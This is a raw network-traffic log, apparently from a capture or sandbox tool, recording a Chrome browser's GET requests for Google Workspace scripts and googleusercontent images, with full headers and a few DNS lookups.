cookie: NID=520=OcrC5bVu06zqWb-j3yVUiVcwVEbBDc0XZSAv4-9q3iGz-b3wMafMA7y5KojWAfblQZRN0uRf6A6sX64I3JXvtNBWPTi86oXuwyYlKfhz8APVjV42Rd_tOVCQLb0V2z5vxoUHLq2-a3cfoX_7FNQpedxLVkL7j7AMOCiFImW8WcTWDx_n2z10SkDwNA
GET

https://workspace.google.com/assets/fb0914da.min.js

chrome.exe

Remote address:

142.250.200.46:443

Request

GET /assets/fb0914da.min.js HTTP/2.0
host: workspace.google.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
origin: https://workspace.google.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: */*
x-client-data: COHsygE=
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://workspace.google.com/intl/en-US/products/drive/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: NID=520=OcrC5bVu06zqWb-j3yVUiVcwVEbBDc0XZSAv4-9q3iGz-b3wMafMA7y5KojWAfblQZRN0uRf6A6sX64I3JXvtNBWPTi86oXuwyYlKfhz8APVjV42Rd_tOVCQLb0V2z5vxoUHLq2-a3cfoX_7FNQpedxLVkL7j7AMOCiFImW8WcTWDx_n2z10SkDwNA
GET

https://workspace.google.com/assets/7ffa16ea.min.js

chrome.exe

Remote address:

142.250.200.46:443

Request

GET /assets/7ffa16ea.min.js HTTP/2.0
host: workspace.google.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
origin: https://workspace.google.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: */*
x-client-data: COHsygE=
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://workspace.google.com/intl/en-US/products/drive/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: NID=520=OcrC5bVu06zqWb-j3yVUiVcwVEbBDc0XZSAv4-9q3iGz-b3wMafMA7y5KojWAfblQZRN0uRf6A6sX64I3JXvtNBWPTi86oXuwyYlKfhz8APVjV42Rd_tOVCQLb0V2z5vxoUHLq2-a3cfoX_7FNQpedxLVkL7j7AMOCiFImW8WcTWDx_n2z10SkDwNA
GET

https://workspace.google.com/assets/b59f5798.min.js

chrome.exe

Remote address:

142.250.200.46:443

Request

GET /assets/b59f5798.min.js HTTP/2.0
host: workspace.google.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
origin: https://workspace.google.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: */*
x-client-data: COHsygE=
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://workspace.google.com/intl/en-US/products/drive/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: NID=520=OcrC5bVu06zqWb-j3yVUiVcwVEbBDc0XZSAv4-9q3iGz-b3wMafMA7y5KojWAfblQZRN0uRf6A6sX64I3JXvtNBWPTi86oXuwyYlKfhz8APVjV42Rd_tOVCQLb0V2z5vxoUHLq2-a3cfoX_7FNQpedxLVkL7j7AMOCiFImW8WcTWDx_n2z10SkDwNA
GET

https://workspace.google.com/assets/7ff80ebe.min.js

chrome.exe

Remote address:

142.250.200.46:443

Request

GET /assets/7ff80ebe.min.js HTTP/2.0
host: workspace.google.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
origin: https://workspace.google.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: */*
x-client-data: COHsygE=
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://workspace.google.com/intl/en-US/products/drive/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: NID=520=OcrC5bVu06zqWb-j3yVUiVcwVEbBDc0XZSAv4-9q3iGz-b3wMafMA7y5KojWAfblQZRN0uRf6A6sX64I3JXvtNBWPTi86oXuwyYlKfhz8APVjV42Rd_tOVCQLb0V2z5vxoUHLq2-a3cfoX_7FNQpedxLVkL7j7AMOCiFImW8WcTWDx_n2z10SkDwNA
GET

https://workspace.google.com/assets/d0a0376a.min.js

chrome.exe

Remote address:

142.250.200.46:443

Request

GET /assets/d0a0376a.min.js HTTP/2.0
host: workspace.google.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
origin: https://workspace.google.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: */*
x-client-data: COHsygE=
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://workspace.google.com/intl/en-US/products/drive/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: NID=520=OcrC5bVu06zqWb-j3yVUiVcwVEbBDc0XZSAv4-9q3iGz-b3wMafMA7y5KojWAfblQZRN0uRf6A6sX64I3JXvtNBWPTi86oXuwyYlKfhz8APVjV42Rd_tOVCQLb0V2z5vxoUHLq2-a3cfoX_7FNQpedxLVkL7j7AMOCiFImW8WcTWDx_n2z10SkDwNA
GET

https://workspace.google.com/assets/f8727730.min.js

chrome.exe

Remote address:

142.250.200.46:443

Request

GET /assets/f8727730.min.js HTTP/2.0
host: workspace.google.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
origin: https://workspace.google.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: */*
x-client-data: COHsygE=
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://workspace.google.com/intl/en-US/products/drive/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: NID=520=OcrC5bVu06zqWb-j3yVUiVcwVEbBDc0XZSAv4-9q3iGz-b3wMafMA7y5KojWAfblQZRN0uRf6A6sX64I3JXvtNBWPTi86oXuwyYlKfhz8APVjV42Rd_tOVCQLb0V2z5vxoUHLq2-a3cfoX_7FNQpedxLVkL7j7AMOCiFImW8WcTWDx_n2z10SkDwNA
DNS

78.169.217.172.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

78.169.217.172.in-addr.arpa

IN PTR

Response

78.169.217.172.in-addr.arpa

IN PTR

lhr48s09-in-f141e100net
DNS

84.173.251.142.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

84.173.251.142.in-addr.arpa

IN PTR

Response

84.173.251.142.in-addr.arpa

IN PTR

wi-in-f841e100net
DNS

workspace.google.com

Dnscache

Remote address:

8.8.8.8:53

Request

workspace.google.com

IN AAAA

Response

workspace.google.com

IN AAAA

2a00:1450:4009:823::200e
DNS

lh3.googleusercontent.com

firefox.exe

Remote address:

8.8.8.8:53

Request

lh3.googleusercontent.com

IN A

Response

lh3.googleusercontent.com

IN CNAME

googlehosted.l.googleusercontent.com

googlehosted.l.googleusercontent.com

IN A

142.250.200.33
GET

https://lh3.googleusercontent.com/7J-_LaRuKfDqWTv_xGtUao2gtOI7GUrr4cNcy_8cHtXpOMLFt3-VdllzAPEVC--KGilwE7pOCUI3KBRWsa_V7TCHXM0Eiqgy1H9m=e365-pa-nu-s0-rw

chrome.exe

Remote address:

142.250.200.33:443

Request

GET /7J-_LaRuKfDqWTv_xGtUao2gtOI7GUrr4cNcy_8cHtXpOMLFt3-VdllzAPEVC--KGilwE7pOCUI3KBRWsa_V7TCHXM0Eiqgy1H9m=e365-pa-nu-s0-rw HTTP/2.0
host: lh3.googleusercontent.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: COHsygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://workspace.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://lh3.googleusercontent.com/qSRx0MPsSqwsxnB7oa8jkMwSmA03iQcMjrmJOnmNkA4o_mA2a9Q1II6moeBU7r1ztzOXQpLnKuMhIeFPmiP46hOw728K4Aw3JY4=e365-pa-nu-rw-w1455

chrome.exe

Remote address:

142.250.200.33:443

Request

GET /qSRx0MPsSqwsxnB7oa8jkMwSmA03iQcMjrmJOnmNkA4o_mA2a9Q1II6moeBU7r1ztzOXQpLnKuMhIeFPmiP46hOw728K4Aw3JY4=e365-pa-nu-rw-w1455 HTTP/2.0
host: lh3.googleusercontent.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: COHsygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://workspace.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://lh3.googleusercontent.com/S26WkdqBRQZW8PC_mo5mE45tepl9xY74x1-esi0Upaey-XV0sbs4Fvt7Uq3sP5LARkSbsOwTTIjKUiXTbVtArtuP4Fg-a7v4cAVN=e365-pa-nu-s0-rw

chrome.exe

Remote address:

142.250.200.33:443

Request

GET /S26WkdqBRQZW8PC_mo5mE45tepl9xY74x1-esi0Upaey-XV0sbs4Fvt7Uq3sP5LARkSbsOwTTIjKUiXTbVtArtuP4Fg-a7v4cAVN=e365-pa-nu-s0-rw HTTP/2.0
host: lh3.googleusercontent.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: COHsygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://workspace.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://lh3.googleusercontent.com/7J-_LaRuKfDqWTv_xGtUao2gtOI7GUrr4cNcy_8cHtXpOMLFt3-VdllzAPEVC--KGilwE7pOCUI3KBRWsa_V7TCHXM0Eiqgy1H9m=e365-pa-nu-s0-v0-rw

chrome.exe

Remote address:

142.250.200.33:443

Request

GET /7J-_LaRuKfDqWTv_xGtUao2gtOI7GUrr4cNcy_8cHtXpOMLFt3-VdllzAPEVC--KGilwE7pOCUI3KBRWsa_V7TCHXM0Eiqgy1H9m=e365-pa-nu-s0-v0-rw HTTP/2.0
host: lh3.googleusercontent.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: COHsygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://workspace.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://lh3.googleusercontent.com/5PYAwhP5cuGQEIi-R8V-keA4jaJZG82g8iBrKCoPKXHCP2nyyO6i6kzAH0i8MA8AVwgOAlxzcai7yKHVzVmUeHMd_FkVeQIG41s=e365-pa-nu-s0-rw

chrome.exe

Remote address:

142.250.200.33:443

Request

GET /5PYAwhP5cuGQEIi-R8V-keA4jaJZG82g8iBrKCoPKXHCP2nyyO6i6kzAH0i8MA8AVwgOAlxzcai7yKHVzVmUeHMd_FkVeQIG41s=e365-pa-nu-s0-rw HTTP/2.0
host: lh3.googleusercontent.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: COHsygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://workspace.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://lh3.googleusercontent.com/RzrCOW3W04EKFPlpQeagbcX-3FrUDfpa7qKhYBVJq0KQxjfBwoRBHGJpTWM2FAQgqioEmE5OxwLslpmuHpN-zD2mqY_AWKj95bsE

chrome.exe

Remote address:

142.250.200.33:443

Request

GET /RzrCOW3W04EKFPlpQeagbcX-3FrUDfpa7qKhYBVJq0KQxjfBwoRBHGJpTWM2FAQgqioEmE5OxwLslpmuHpN-zD2mqY_AWKj95bsE HTTP/2.0
host: lh3.googleusercontent.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: COHsygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://workspace.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://lh3.googleusercontent.com/dvAfIQb0KajN6WUONfemiYUwCwrzoN7qAUsioJt2DyV1dt3LNLUmxHHvCXFHI6ZEFxjx_ClxenFxr587O36XX8a5QeUMEAS-1WJe

chrome.exe

Remote address:

142.250.200.33:443

Request

GET /dvAfIQb0KajN6WUONfemiYUwCwrzoN7qAUsioJt2DyV1dt3LNLUmxHHvCXFHI6ZEFxjx_ClxenFxr587O36XX8a5QeUMEAS-1WJe HTTP/2.0
host: lh3.googleusercontent.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: COHsygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://workspace.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://lh3.googleusercontent.com/mFX4RtYSpBwXZXB71FNeXM6v9iEcAsCYoEWvaA0SJB_EfOi2TvXNJ455zRiaCZb-_IiTsbEDlOWQi1Y2as2t_9rzUQe6zkldGInt

chrome.exe

Remote address:

142.250.200.33:443

Request

GET /mFX4RtYSpBwXZXB71FNeXM6v9iEcAsCYoEWvaA0SJB_EfOi2TvXNJ455zRiaCZb-_IiTsbEDlOWQi1Y2as2t_9rzUQe6zkldGInt HTTP/2.0
host: lh3.googleusercontent.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: COHsygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://workspace.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://lh3.googleusercontent.com/S26WkdqBRQZW8PC_mo5mE45tepl9xY74x1-esi0Upaey-XV0sbs4Fvt7Uq3sP5LARkSbsOwTTIjKUiXTbVtArtuP4Fg-a7v4cAVN=e365-pa-nu-s0-v0-rw

chrome.exe

Remote address:

142.250.200.33:443

Request

GET /S26WkdqBRQZW8PC_mo5mE45tepl9xY74x1-esi0Upaey-XV0sbs4Fvt7Uq3sP5LARkSbsOwTTIjKUiXTbVtArtuP4Fg-a7v4cAVN=e365-pa-nu-s0-v0-rw HTTP/2.0
host: lh3.googleusercontent.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: COHsygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://workspace.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://lh3.googleusercontent.com/5PYAwhP5cuGQEIi-R8V-keA4jaJZG82g8iBrKCoPKXHCP2nyyO6i6kzAH0i8MA8AVwgOAlxzcai7yKHVzVmUeHMd_FkVeQIG41s=e365-pa-nu-s0-v0-rw

chrome.exe

Remote address:

142.250.200.33:443

Request

GET /5PYAwhP5cuGQEIi-R8V-keA4jaJZG82g8iBrKCoPKXHCP2nyyO6i6kzAH0i8MA8AVwgOAlxzcai7yKHVzVmUeHMd_FkVeQIG41s=e365-pa-nu-s0-v0-rw HTTP/2.0
host: lh3.googleusercontent.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: COHsygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://workspace.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://lh3.googleusercontent.com/qi-5khAOg8HlqE6BVJSyGuReX7cLrXx-tg_UlrLsP0sTvuIvMe2IdCenW9jL-KTjxkVf9f0ONBMOTBPE84bp-cl6PPEKhNgRzTQ=e365-pa-nu-s0-rw

chrome.exe

Remote address:

142.250.200.33:443

Request

GET /qi-5khAOg8HlqE6BVJSyGuReX7cLrXx-tg_UlrLsP0sTvuIvMe2IdCenW9jL-KTjxkVf9f0ONBMOTBPE84bp-cl6PPEKhNgRzTQ=e365-pa-nu-s0-rw HTTP/2.0
host: lh3.googleusercontent.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: COHsygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://workspace.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://lh3.googleusercontent.com/luR__x3sJf7BA833oja0gDViwRv_hnYZKBEcQOo9iBu3eKttHYmktkaCRjE4ECxmzFSQTIxMoCyhRY6WwXPJvw564LfY457Eig=e365-pa-nu-s0-rw

chrome.exe

Remote address:

142.250.200.33:443

Request

GET /luR__x3sJf7BA833oja0gDViwRv_hnYZKBEcQOo9iBu3eKttHYmktkaCRjE4ECxmzFSQTIxMoCyhRY6WwXPJvw564LfY457Eig=e365-pa-nu-s0-rw HTTP/2.0
host: lh3.googleusercontent.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: COHsygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://workspace.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://lh3.googleusercontent.com/SB__9Ik-UqlTHS9Mp0zO-QVdPPVxb3o1Ek17Z3y1Q7_rUGN0j8s-xA0rqdAXM0Mb1z3VJ8v-rDzHfDX-yLGfMxgbaKGAGHPmQZis=e365-pa-nu-s0-rw

chrome.exe

Remote address:

142.250.200.33:443

Request

GET /SB__9Ik-UqlTHS9Mp0zO-QVdPPVxb3o1Ek17Z3y1Q7_rUGN0j8s-xA0rqdAXM0Mb1z3VJ8v-rDzHfDX-yLGfMxgbaKGAGHPmQZis=e365-pa-nu-s0-rw HTTP/2.0
host: lh3.googleusercontent.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: COHsygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://workspace.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://lh3.googleusercontent.com/kb_Qu0wccTbbxMVmy7WnBOrPO8taACz0oi32xRNPuBBZe4uz50DwiYufFP7S3E230TGQSEu3Nu021PDcIADDimr7HrenNYCVv_EY=e365-pa-nu-s0-rw

chrome.exe

Remote address:

142.250.200.33:443

Request

GET /kb_Qu0wccTbbxMVmy7WnBOrPO8taACz0oi32xRNPuBBZe4uz50DwiYufFP7S3E230TGQSEu3Nu021PDcIADDimr7HrenNYCVv_EY=e365-pa-nu-s0-rw HTTP/2.0
host: lh3.googleusercontent.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: COHsygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://workspace.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://lh3.googleusercontent.com/wePSigsq8uFv9S_k42piWs8mGFKr97FSAonu0EnxiiEim4g4n6KIGiu9o0OgbP8zq6GeJQW60MEDzWAWb5ahu9Sa0ZYUnh1fO8E=e365-pa-nu-s0-rw

chrome.exe

Remote address:

142.250.200.33:443

Request

GET /wePSigsq8uFv9S_k42piWs8mGFKr97FSAonu0EnxiiEim4g4n6KIGiu9o0OgbP8zq6GeJQW60MEDzWAWb5ahu9Sa0ZYUnh1fO8E=e365-pa-nu-s0-rw HTTP/2.0
host: lh3.googleusercontent.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: COHsygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://workspace.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://lh3.googleusercontent.com/I-x3e5aXGAe8z9azwZi2W1Axx1xsibQBx8TRVHhbFhRucNWn-6PngJ1BoXci_06bcmvUaVc_HLTvPsv6NiqKJq4QyuYbYfm9bj9iZA=e365-pa-nu-s0-rw

chrome.exe

Remote address:

142.250.200.33:443

Request

GET /I-x3e5aXGAe8z9azwZi2W1Axx1xsibQBx8TRVHhbFhRucNWn-6PngJ1BoXci_06bcmvUaVc_HLTvPsv6NiqKJq4QyuYbYfm9bj9iZA=e365-pa-nu-s0-rw HTTP/2.0
host: lh3.googleusercontent.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: COHsygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://workspace.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://lh3.googleusercontent.com/5xw2Y5jI0iz24qieD7U1ETqd1dwUZvtmZuJiGkKSQj-yEFaEVmLw6XgKXzOLon_RiX-5t3amygvXebgNN8bgyxQlO_3vhAgwpyMc=e365-pa-nu-s0-rw

chrome.exe

Remote address:

142.250.200.33:443

Request

GET /5xw2Y5jI0iz24qieD7U1ETqd1dwUZvtmZuJiGkKSQj-yEFaEVmLw6XgKXzOLon_RiX-5t3amygvXebgNN8bgyxQlO_3vhAgwpyMc=e365-pa-nu-s0-rw HTTP/2.0
host: lh3.googleusercontent.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: COHsygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://workspace.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://lh3.googleusercontent.com/gXQ1CySD9oW9wM2niB5c0fnbttInuG7qtUzp7oQzry-ok6hg3lMuk6z0yKJTgUd2qBGs3xJwZF64iflmj8xP8SUwOvNbLPHGICjT=e365-pa-nu-s0-rw

chrome.exe

Remote address:

142.250.200.33:443

Request

GET /gXQ1CySD9oW9wM2niB5c0fnbttInuG7qtUzp7oQzry-ok6hg3lMuk6z0yKJTgUd2qBGs3xJwZF64iflmj8xP8SUwOvNbLPHGICjT=e365-pa-nu-s0-rw HTTP/2.0
host: lh3.googleusercontent.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: COHsygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://workspace.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://lh3.googleusercontent.com/dvAfIQb0KajN6WUONfemiYUwCwrzoN7qAUsioJt2DyV1dt3LNLUmxHHvCXFHI6ZEFxjx_ClxenFxr587O36XX8a5QeUMEAS-1WJe=e365-pa-nu-s0-rw

chrome.exe

Remote address:

142.250.200.33:443

Request

GET /dvAfIQb0KajN6WUONfemiYUwCwrzoN7qAUsioJt2DyV1dt3LNLUmxHHvCXFHI6ZEFxjx_ClxenFxr587O36XX8a5QeUMEAS-1WJe=e365-pa-nu-s0-rw HTTP/2.0
host: lh3.googleusercontent.com
